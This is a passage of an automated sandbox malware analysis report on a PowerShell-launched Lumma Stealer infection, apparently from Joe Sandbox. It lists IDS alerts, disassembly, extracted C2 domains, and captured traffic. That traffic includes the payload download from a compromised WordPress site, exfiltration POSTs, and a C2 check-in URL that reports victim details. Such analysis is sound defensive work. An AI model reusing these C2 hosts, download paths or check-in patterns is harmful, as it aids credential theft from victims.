Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-31h]	13_2_0042DBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+08h]	13_2_00447BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+08h]	13_2_00447C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-60078E0Fh]	13_2_0043544B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-7D570173h]	13_2_0041CC25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [ecx], si	13_2_0041CC25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+0Ch]	13_2_0041F430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-302A60D0h]	13_2_0041F430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-50C580D4h]	13_2_0041F430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+edi]	13_2_0040B4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	13_2_0041D4CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+08h]	13_2_00447CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	13_2_00432CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000A6h]	13_2_00430C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00434567
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h	13_2_0042ED3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_0043E5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000B1h]	13_2_00420DD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebx-692D8843h]	13_2_00410DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+34h]	13_2_0041158E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [esi], cx	13_2_0041158E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	13_2_00419DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_004315A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C6BF57D2h	13_2_004445A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	13_2_0041CE5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E7863EBh]	13_2_00419E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E7863EBh]	13_2_00419E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E7863EBh]	13_2_00419E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2C331E1Fh	13_2_00419E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E7863EBh]	13_2_00419E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then xor ebp, ebp	13_2_00419E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [ebx], ax	13_2_00420670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-7D570173h]	13_2_0041C631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov word ptr [ecx], si	13_2_0041C631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then xor byte ptr [esp+edx+5Ch], dl	13_2_0042CEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then cmp word ptr [ebp+ebx+02h], 0000h	13_2_004276A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx-0Fh]	13_2_00441F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_004457F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp ecx	13_2_0042F780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov edx, ecx	13_2_0040E790

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2860232 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) : 192.168.2.6:49710 -> 91.206.178.120:5001
Source: Network traffic	Suricata IDS: 2860233 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) : 91.206.178.120:5001 -> 192.168.2.6:49710
Source: Network traffic	Suricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.6:49712 -> 34.120.190.48:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49989 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49989 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49990 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49995 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49997 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49996 -> 172.67.172.121:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: DfreamWave.cyou
Source: Malware configuration extractor	URLs: shiningrstars.help
Source: Malware configuration extractor	URLs: mercharena.biz
Source: Malware configuration extractor	URLs: generalmills.pro
Source: Malware configuration extractor	URLs: stormlegue.com
Source: Malware configuration extractor	URLs: blast-hubs.com
Source: Malware configuration extractor	URLs: blastikcn.com
Source: Malware configuration extractor	URLs: nestlecompany.pro

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 5001
Source: unknown	Network traffic detected: HTTP traffic on port 5001 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 5001
Source: unknown	Network traffic detected: HTTP traffic on port 5001 -> 49813

Source: global traffic

TCP traffic: 192.168.2.6:49710 -> 91.206.178.120:5001

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 172.67.172.121 172.67.172.121

Source: Joe Sandbox View	ASN Name: ARTNET2PL ARTNET2PL
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49709 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49710 -> 91.206.178.120:5001
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49813 -> 91.206.178.120:5001
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49813 -> 91.206.178.120:5001
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49990 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49989 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49996 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49993 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49997 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49992 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49995 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49991 -> 172.67.172.121:443
Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.6:49712 -> 34.120.190.48:443
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 34.120.190.48:443 -> 192.168.2.6:49712

Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/header-footer-code-manager/images/TestLAB.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.littlemoroccanthings.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dfreamwave.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 43Host: dfreamwave.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RANZ4SYFMY2AXZ3E9BCookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12856Host: dfreamwave.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4D5K2UZJCJ2WGH7NB7Cookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15102Host: dfreamwave.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OAXMOCM8CGTP4BF24ZWCookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19966Host: dfreamwave.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8SE7FLO7B1Cookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2475Host: dfreamwave.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3EJSKPNE1GCCJL4DJCookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 386425Host: dfreamwave.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=dyRP18YcQFnYCAanmayxkN4ksy.k1.tFVjIT6_69W5I-1739863730-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: dfreamwave.cyou
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=83035 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /script_end?random_number=83035 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001

Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 91.206.178.120
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.1
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.1
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.1
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-content/plugins/header-footer-code-manager/images/TestLAB.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.littlemoroccanthings.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=83035 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /script_end?random_number=83035 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 91.206.178.120:5001

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: www.littlemoroccanthings.com
Source: global traffic	DNS traffic detected: DNS query: dfreamwave.cyou

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dfreamwave.cyou

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 18 Feb 2025 07:28:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpwnJoeSII8ItbGw7mz4fw4z4hIOX%2FXESO%2BA8b7DX17%2Ffq4o0DRhlV9fqFtdhG6Ig4uOEKQ6nxT6nI6LM0Qw4Wc06ZlWU4Ucqw9WILmScB9LXeqD9%2BzHpOvBVe5mZ0q8US4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c4d7a1d519e05-EWR

Source: powershell.exe, 00000000.00000002.2371135913.000000000577B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2371135913.000000000569E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001
Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=
Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3369185807.00000290D8D35000.00000004.00000020.00020000.00000000.sdmp, wEY98gM1Jj.ps1	String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=$randomNumber
Source: powershell.exe, 00000000.00000002.2371135913.000000000577B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=83035
Source: powershell.exe, 00000000.00000002.2371135913.000000000577B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=83035$M
Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_start?ip=
Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3369185807.00000290D8D35000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3368973649.000000F700479000.00000004.00000010.00020000.00000000.sdmp, wEY98gM1Jj.ps1	String found in binary or memory: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra
Source: powershell.exe, 00000000.00000002.2371135913.000000000569E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft
Source: powershell.exe, 00000000.00000002.2371135913.000000000569E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m
Source: notepad.exe, 00000003.00000002.3368973649.000000F700479000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://96.170:5001/script_end?random_number=$randomNo
Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3369185807.00000290D8D35000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000003.00000002.3368973649.000000F700479000.00000004.00000010.00020000.00000000.sdmp, wEY98gM1Jj.ps1	String found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: is-SBTFQ.tmp.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: is-SBTFQ.tmp.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-IS7LO.tmp.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000000.00000002.2383933157.0000000007890000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2384360548.0000000007930000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: is-SBTFQ.tmp.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-IS7LO.tmp.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: is-IS7LO.tmp.10.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: is-SBTFQ.tmp.10.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: is-SBTFQ.tmp.10.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-IS7LO.tmp.10.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: is-SBTFQ.tmp.10.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000000.00000002.2381931476.00000000064C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, is-IS7LO.tmp.10.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000003.2571404354.00000000032E6000.00000004.00001000.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: is-SBTFQ.tmp.10.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: powershell.exe, 00000000.00000002.2371135913.000000000570D000.00000004.00000800.00020000.00000000.sdmp, cmd.tmp, 0000000A.00000002.2573353388.000000000018D000.00000004.00000010.00020000.00000000.sdmp, is-SBTFQ.tmp.10.dr, is-IS7LO.tmp.10.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: is-UDKGG.tmp.10.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000000.00000002.2371135913.00000000055B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2371135913.0000000005461000.00000004.00000800.00020000.00000000.sdmp, OperaAirSetup.exe, 0000000C.00000002.2856805548.0000000003371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
